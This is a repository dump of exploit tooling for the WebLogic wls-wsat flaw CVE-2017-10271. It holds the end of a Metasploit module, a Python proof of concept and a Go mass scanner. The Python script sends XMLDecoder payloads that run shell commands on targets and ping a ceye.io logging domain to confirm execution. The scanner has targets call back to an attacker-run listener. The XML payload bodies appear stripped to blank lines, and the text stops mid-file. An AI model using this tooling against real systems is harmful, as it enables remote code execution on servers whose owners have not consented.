'+Rex::Text.rand_text_alphanumeric(20)+'

' 137 | send_response(cli, random_content) 138 | 139 | @received_request = true 140 | end 141 | 142 | # 143 | # The exploit method connects to the remote service and sends a randomly generated string 144 | # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive 145 | # the response from. This is based off of the exploit technique from 146 | # exploits/windows/novell/netiq_pum_eval.rb 147 | # 148 | # This doesn't work as is because MSF cannot mix HttpServer and HttpClient 149 | # at the time of authoring this 150 | # 151 | # def check 152 | # start_service 153 | # 154 | # print_status('Sending the check payload...') 155 | # res = send_request_cgi({ 156 | # 'method' => 'POST', 157 | # 'uri' => normalize_uri(target_uri.path), 158 | # 'data' => check_process_builder_payload, 159 | # 'ctype' => 'text/xml;charset=UTF-8' 160 | # }, datastore['TIMEOUT']) 161 | # 162 | # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...") 163 | # 164 | # waited = 0 165 | # until @received_request 166 | # sleep 1 167 | # waited += 1 168 | # if waited > datastore['HTTP_DELAY'] 169 | # stop_service 170 | # return Exploit::CheckCode::Safe 171 | # end 172 | # end 173 | # 174 | # stop_service 175 | # return Exploit::CheckCode::Vulnerable 176 | # end 177 | 178 | # 179 | # The exploit method connects to the remote service and sends the specified payload 180 | # encapsulated within a SOAP XML body. 181 | # 182 | def exploit 183 | send_request_cgi({ 184 | 'method' => 'POST', 185 | 'uri' => normalize_uri(target_uri.path), 186 | 'data' => exploit_process_builder_payload, 187 | 'ctype' => 'text/xml;charset=UTF-8' 188 | }, datastore['TIMEOUT']) 189 | end 190 | end 191 | -------------------------------------------------------------------------------- /CVE-2017-10271/original-poc/original-poc.py: -------------------------------------------------------------------------------- 1 | 2 | #coding=utf8 3 | import sys 4 | import requests 5 | import random 6 | from string import letters 7 | 8 | 9 | class Exploit: 10 | 11 | def __init__(self, url): 12 | self.url = url if not url.endswith('/') else url.strip('/') 13 | self.API = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' 14 | self.domain = 'xxxxxx.ceye.io' 15 | self.BANNER = ''.join([random.choice(letters) for i in range(6)]) 16 | self.API_URL = 'http://api.ceye.io/v1/records?token={}&type=dns&filter={}'.format(self.API, self.BANNER) 17 | 18 | def run(self): 19 | self.post(self.get_linux_payload()) 20 | self.post(self.get_windows_payload()) 21 | 22 | def post(self, data): 23 | headers = { 24 | "Content-Type": "text/xml;charset=UTF-8", 25 | "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 26 | } 27 | payload = "/wls-wsat/CoordinatorPortType" 28 | 29 | vulnurl = self.url + payload 30 | try: 31 | req = requests.post(vulnurl, data=data, headers=headers, timeout=10, verify=False) 32 | except Exception: 33 | print "[-] Connection Error" 34 | 35 | if self.confirm_sucess(): 36 | print "[!] %s is vuln" % vulnurl 37 | sys.exit(0) 38 | 39 | def get_windows_payload(self): 40 | windows_post_data = ''' 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | cmd 49 | 50 | 51 | /c 52 | 53 | 54 | ping {}.{} 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | ''' 65 | return windows_post_data.format(self.BANNER, self.domain) 66 | 67 | def get_linux_payload(self): 68 | linux_post_data = ''' 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | /bin/sh 77 | 78 | 79 | -c 80 | 81 | 82 | ping {}.{} 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | ''' 93 | return linux_post_data.format(self.BANNER, self.domain) 94 | 95 | def confirm_sucess(self): 96 | req = requests.get(self.API_URL) 97 | d = req.json() 98 | try: 99 | name = d['data'][0]['name'] 100 | # print self.BANNER 101 | # print name 102 | if self.BANNER in name: 103 | return True 104 | except Exception: 105 | return False 106 | 107 | 108 | if __name__ == "__main__": 109 | if len(sys.argv) < 2: 110 | print 'Usage: python %s url' % sys.argv[0] 111 | sys.exit(0) 112 | 113 | exploit = Exploit(sys.argv[1]) 114 | exploit.run() 115 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/Makefile: -------------------------------------------------------------------------------- 1 | BINARY=CVE-2017-10271 2 | GOARCH=amd64 3 | HASH=$(shell git rev-parse HEAD) 4 | BUILDDATE=$(shell date -u '+%Y-%m-%dT%k:%M:%SZ') 5 | GOVERSION=$(shell go version | sed -e 's/ /|^|/g') 6 | VERSION=1.5.1 7 | LDFLAGS=-ldflags "-s -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildHash=$(HASH) -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildTime=$(BUILDDATE) -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildVersion=$(VERSION) -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildGoVersion=$(GOVERSION)" 8 | 9 | lint: 10 | golint ./... 11 | 12 | vet: 13 | go vet ./... 14 | 15 | clean: 16 | rm -rf bin 17 | 18 | install: 19 | go install -race -v 20 | 21 | binary-depends: 22 | mkdir -p bin 23 | 24 | # Builds 25 | darwin-build: vet lint binary-depends 26 | env GOOS=darwin GOARCH=$(GOARCH) go build $(LDFLAGS) -race -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).darwin 27 | 28 | dragonfly-build: vet lint binary-depends 29 | env GOOS=dragonfly GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).dragonfly 30 | 31 | freebsd-build: vet lint binary-depends 32 | env GOOS=freebsd GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).freebsd 33 | 34 | linux-build: vet lint binary-depends 35 | env GOOS=linux GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).linux 36 | 37 | netbsd-build: vet lint binary-depends 38 | env GOOS=netbsd GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).netbsd 39 | 40 | openbsd-build: vet lint binary-depends 41 | env GOOS=openbsd GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).openbsd 42 | 43 | solaris-build: vet lint binary-depends 44 | env GOOS=solaris GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).solaris 45 | 46 | windows-build: vet lint binary-depends 47 | env GOOS=windows GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).windows.exe 48 | 49 | build: darwin-build dragonfly-build freebsd-build linux-build netbsd-build openbsd-build solaris-build windows-build 50 | 51 | .PHONY: vet install binary-depends lint 52 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-10271 Vulnerability Scanner 2 | 3 | 4 | Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection Executable 5 | 6 | ### Usage 7 | 8 | ``` 9 | ~/g/p/C/scanners ❯❯❯ ./bin/CVE-2017-10271.release.1.5.0.amd64.darwin -h 10 | A purpose built scanner for detecting CVE-2017-10271. Starts a web 11 | server on the LPORT and then logs any host which contacts it, as they are 12 | vulnerable. 13 | 14 | Example usage: 15 | ./CVE-2017-10271.release.1.5.0.amd64.linux -s "10.10.10.10" -t "$(pwd)/targets.txt -o output_file.txt -v --all-urls" 16 | 17 | Example targets.txt: 18 | http://pwned.com:7001/ 19 | https://pwnedalso.com:8002/ 20 | 21 | Usage: 22 | cve-2017-10271 [flags] 23 | cve-2017-10271 [command] 24 | 25 | Available Commands: 26 | help Help about any command 27 | version The version of the binary 28 | 29 | Flags: 30 | -u, --all-urls Check for all possible vulnerable URL suffixes 31 | -h, --help help for cve-2017-10271 32 | -s, --listening-host string The IP of this machine's public interface 33 | -l, --listening-port int The port to listen for vulnerable responses (default 4444) 34 | -o, --output-file string File to output results to 35 | -t, --target-file string File with list of targets in http(s)://HOSTNAME:PORT format 36 | -a, --threads int Number of threads to use while scanning (default 10) 37 | -v, --verbose Enable verbose mode (Print who is being scanned 38 | -w, --wait-time int Seconds to wait after we complete sending payloads (default 20) 39 | 40 | Use "cve-2017-10271 [command] --help" for more information about a command. 41 | ``` 42 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.darwin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.darwin -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.dragonfly: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.dragonfly -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.freebsd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.freebsd -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.linux: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.linux -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.netbsd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.netbsd -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.openbsd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.openbsd -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.solaris: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.solaris -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.windows.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.windows.exe -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/cmd/root.go: -------------------------------------------------------------------------------- 1 | // Copyright © 2018 Kevin Kirsche 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | package cmd 16 | 17 | import ( 18 | "bufio" 19 | "fmt" 20 | "net/http" 21 | "net/url" 22 | "os" 23 | "strings" 24 | "sync" 25 | "time" 26 | 27 | "github.com/kkirsche/CVE-2017-10271/scanners/libcve201710271" 28 | "github.com/sirupsen/logrus" 29 | "github.com/spf13/cobra" 30 | ) 31 | 32 | var ( 33 | config libcve201710271.Config 34 | ) 35 | 36 | // RootCmd represents the base command when called without any subcommands 37 | var RootCmd = &cobra.Command{ 38 | Use: "cve-2017-10271", 39 | Short: "Scan for the CVE-2017-10271 vulnerability", 40 | Long: fmt.Sprintf(`A purpose built scanner for detecting CVE-2017-10271. Starts a web 41 | server on the LPORT and then logs any host which contacts it, as they are 42 | vulnerable. 43 | 44 | Example usage: 45 | ./CVE-2017-10271.release.%s.amd64.linux -s "10.10.10.10" -t "$(pwd)/targets.txt -o output_file.txt -v --all-urls" 46 | 47 | Example targets.txt: 48 | http://pwned.com:7001/ 49 | https://pwnedalso.com:8002/ 50 | `, BuildVersion), 51 | // Uncomment the following line if your bare application 52 | // has an action associated with it: 53 | Run: func(cmd *cobra.Command, args []string) { 54 | if config.Verbose { 55 | logrus.SetLevel(logrus.InfoLevel) 56 | } else { 57 | logrus.SetLevel(logrus.WarnLevel) 58 | } 59 | 60 | if config.Lport < 1 || config.Lport > 65535 { 61 | logrus.Errorln("Listening port must be greater than 0 and less than 65536. Exiting...") 62 | return 63 | } 64 | 65 | if config.Lhost == "" { 66 | logrus.Errorln("Listening host IP address or hostname is required. Exiting...") 67 | return 68 | } 69 | 70 | if config.TargetFile == "" { 71 | logrus.Errorln("Target file is required. Exiting...") 72 | return 73 | } 74 | 75 | if config.OutputFile != "" { 76 | f, err := os.OpenFile(config.OutputFile, os.O_WRONLY|os.O_CREATE, 0755) 77 | if err != nil { 78 | logrus.WithError(err).Errorln("Failed to open file for writing") 79 | } 80 | logrus.SetOutput(f) 81 | } 82 | 83 | libcve201710271.Banner(config) 84 | 85 | logrus.Infof("Starting webserver on port %d to catch vulnerable hosts", config.Lport) 86 | go func() { 87 | http.HandleFunc("/cve-2017-10271", vulnHandler) 88 | http.ListenAndServe(fmt.Sprintf(":%d", config.Lport), vulnLog(http.DefaultServeMux)) 89 | }() 90 | 91 | f, err := os.Open(config.TargetFile) 92 | if err != nil { 93 | logrus.WithError(err).Errorln("Failed to open target file.") 94 | return 95 | } 96 | defer f.Close() 97 | 98 | targetCh := make(chan libcve201710271.TargetHost) 99 | 100 | m := &sync.Mutex{} 101 | for w := 1; w <= config.Threads; w++ { 102 | go libcve201710271.Worker(w, m, targetCh) 103 | } 104 | 105 | scanner := bufio.NewScanner(f) 106 | for scanner.Scan() { 107 | rhost := strings.TrimSpace(scanner.Text()) 108 | rhost = strings.TrimRight(rhost, "/") 109 | 110 | var urls []string 111 | urls = libcve201710271.DefaultURLs 112 | if config.AllURLs { 113 | urls = libcve201710271.AllURLs 114 | } 115 | 116 | for _, url := range urls { 117 | xmlPayload := libcve201710271.GenerateCheckPayload(config.Lhost, config.Lport, rhost, url) 118 | th := libcve201710271.TargetHost{ 119 | R: rhost, 120 | P: xmlPayload, 121 | U: url, 122 | } 123 | targetCh <- th 124 | } 125 | } 126 | 127 | if err := scanner.Err(); err != nil { 128 | close(targetCh) 129 | logrus.Fatal(err) 130 | } 131 | close(targetCh) 132 | 133 | logrus.Infoln("Sleeping for 10 seconds in case we have any stragglers...") 134 | time.Sleep(time.Duration(config.WaitTime) * time.Second) 135 | }, 136 | } 137 | 138 | func vulnLog(handler http.Handler) http.Handler { 139 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 140 | t, _ := url.QueryUnescape(r.URL.Query().Get("target")) 141 | if config.OutputFile != "" { 142 | fmt.Printf("[VULNERABLE] Remote Address: %s | From Target: %s | Method: %s\n", r.RemoteAddr, t, r.Method) 143 | } 144 | logrus.Warnf("[VULNERABLE] Remote Address: %s | From Target: %s | Method: %s", r.RemoteAddr, t, r.Method) 145 | handler.ServeHTTP(w, r) 146 | }) 147 | } 148 | 149 | func vulnHandler(w http.ResponseWriter, r *http.Request) { 150 | fmt.Fprintf(w, "WARNING! You are vulnerable to CVE-2017-10271") 151 | } 152 | 153 | // Execute adds all child commands to the root command and sets flags appropriately. 154 | // This is called by main.main(). It only needs to happen once to the rootCmd. 155 | func Execute() { 156 | if err := RootCmd.Execute(); err != nil { 157 | fmt.Println(err) 158 | os.Exit(1) 159 | } 160 | } 161 | 162 | func init() { 163 | 164 | // Cobra also supports local flags, which will only run 165 | // when this action is called directly. 166 | RootCmd.Flags().StringVarP(&config.Lhost, "listening-host", "s", "", "The IP of this machine's public interface") 167 | RootCmd.Flags().IntVarP(&config.Lport, "listening-port", "l", 4444, "The port to listen for vulnerable responses") 168 | RootCmd.Flags().StringVarP(&config.TargetFile, "target-file", "t", "", "File with list of targets in http(s)://HOSTNAME:PORT format") 169 | RootCmd.Flags().BoolVarP(&config.Verbose, "verbose", "v", false, "Enable verbose mode (Print who is being scanned") 170 | RootCmd.Flags().BoolVarP(&config.AllURLs, "all-urls", "u", false, "Check for all possible vulnerable URL suffixes") 171 | RootCmd.Flags().StringVarP(&config.OutputFile, "output-file", "o", "", "File to output results to") 172 | RootCmd.Flags().IntVarP(&config.Threads, "threads", "a", 10, "Number of threads to use while scanning") 173 | RootCmd.Flags().IntVarP(&config.WaitTime, "wait-time", "w", 20, "Seconds to wait after we complete sending payloads") 174 | } 175 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/cmd/version.go: -------------------------------------------------------------------------------- 1 | // Copyright © 2018 Kevin Kirsche 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | package cmd 16 | 17 | import ( 18 | "strings" 19 | 20 | "github.com/sirupsen/logrus" 21 | "github.com/spf13/cobra" 22 | ) 23 | 24 | var ( 25 | // BuildVersion the version of the binary (e.g. 1.2.0) 26 | BuildVersion string 27 | // BuildGoVersion is what version of Golang we built the binary with 28 | BuildGoVersion string 29 | // BuildHash is the git hash that we were at when this was built 30 | BuildHash string 31 | // BuildTime is when we built the binary 32 | BuildTime string 33 | ) 34 | 35 | // versionCmd represents the version command 36 | var versionCmd = &cobra.Command{ 37 | Use: "version", 38 | Short: "The version of the binary", 39 | Long: `The build date and build hash associated with the build to allow for 40 | better identification of when the binary was made and what features it 41 | offers`, 42 | Run: func(cmd *cobra.Command, args []string) { 43 | logrus.Printf("Version:\t%s", BuildVersion) 44 | logrus.Printf("Go Version:\t%s", strings.Join(strings.Split(BuildGoVersion, "|^|"), " ")) 45 | logrus.Printf("Git Hash:\t%s", BuildHash) 46 | logrus.Printf("Build Time:\t%s", BuildTime) 47 | }, 48 | } 49 | 50 | func init() { 51 | RootCmd.AddCommand(versionCmd) 52 | 53 | // Here you will define your flags and configuration settings. 54 | 55 | // Cobra supports Persistent Flags which will work for this command 56 | // and all subcommands, e.g.: 57 | // versionCmd.PersistentFlags().String("foo", "", "A help for foo") 58 | 59 | // Cobra supports local flags which will only run when this command 60 | // is called directly, e.g.: 61 | // versionCmd.Flags().BoolP("toggle", "t", false, "Help message for toggle") 62 | } 63 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/banner.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | ) 7 | 8 | // Banner prints out a banner with the settings of the applications 9 | func Banner(config Config) { 10 | fmt.Println(strings.Repeat("=", 80)) 11 | fmt.Println("Author: Kevin Kirsche (d3c3pt10n)") 12 | fmt.Println(strings.Repeat("=", 80)) 13 | fmt.Println("Configuration:") 14 | fmt.Printf("\tListening Host: %s\n", config.Lhost) 15 | fmt.Printf("\tListening Port: %d\n", config.Lport) 16 | fmt.Printf("\tOutput File: %s\n", config.OutputFile) 17 | fmt.Printf("\tTargets File: %s\n", config.TargetFile) 18 | fmt.Printf("\tThreads: %d\n", config.Threads) 19 | fmt.Printf("\tScan Complete Wait Time: %d\n", config.WaitTime) 20 | fmt.Printf("\tScan All URLs: %t\n", config.AllURLs) 21 | fmt.Printf("\tVerbose mode: %t\n", config.Verbose) 22 | fmt.Println(strings.Repeat("=", 80)) 23 | } 24 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/config.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | // Config is used to store the different configurations that we need 4 | type Config struct { 5 | Lhost string 6 | Lport int 7 | TargetFile string 8 | Verbose bool 9 | OutputFile string 10 | Threads int 11 | WaitTime int 12 | AllURLs bool 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/payload.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | import ( 4 | "fmt" 5 | "net/url" 6 | ) 7 | 8 | // GenerateCheckPayload is used to create a check payload for use in identifying 9 | // vulnerable hosts 10 | func GenerateCheckPayload(lhost string, lport int, rhost, u string) string { 11 | xmlPayload := fmt.Sprintf(` 12 | 13 | 14 | 15 | 16 | http://%s:%d/cve-2017-10271?target=%s%s 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | `, lhost, lport, url.QueryEscape(rhost), url.QueryEscape(u)) 26 | 27 | return xmlPayload 28 | } 29 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/request.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | import ( 4 | "bytes" 5 | "crypto/tls" 6 | "fmt" 7 | "net/http" 8 | "strings" 9 | "sync" 10 | "time" 11 | 12 | "github.com/sirupsen/logrus" 13 | ) 14 | 15 | // SendRequest is used to generate the actual request that we send out 16 | func SendRequest(th 